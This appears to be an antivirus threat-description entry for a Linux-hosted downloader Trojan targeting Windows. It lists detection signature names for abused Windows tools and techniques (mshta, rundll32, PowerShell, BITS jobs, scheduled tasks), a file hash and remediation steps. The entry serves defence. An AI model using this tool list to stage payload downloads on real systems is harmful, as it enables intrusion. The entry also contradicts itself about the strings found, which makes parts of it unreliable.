Concrete signature match: Trojan - Appears legitimate but performs malicious actions for Linux platform, family Downldr
This is a downloader Trojan detected on a Linux system. Despite the platform, its code contains numerous strings and references to Windows-specific tools (e.g., PowerShell, rundll32, mshta), indicating its purpose is to download and execute additional malware on Windows endpoints. The Linux machine may be acting as a distribution host or file share for the Windows-targeted payload.
Relevant strings associated with this threat: - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT) - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT) - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT) - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT) - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT) - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT) - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT) - rundll32 (PEHSTR_EXT) - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT) - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT) - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT) - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT) - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT) - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT) - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT) - !#HSTR:ExecutionGuardrails (PEHSTR_EXT) - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT) - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT) - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT) - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT) No specific strings found for this threat
652285d260515c08cfe146ebdd2f5a4977ec490a608c57007abcb5b6f4fd49751. Isolate the affected Linux host from the network. 2. Ensure the detected file is quarantined or deleted. 3. Investigate the Linux system for the initial point of compromise (e.g., vulnerable web service). 4. Scan Windows endpoints for signs of compromise, looking for unusual process executions (PowerShell, rundll32, mshta) and new scheduled tasks.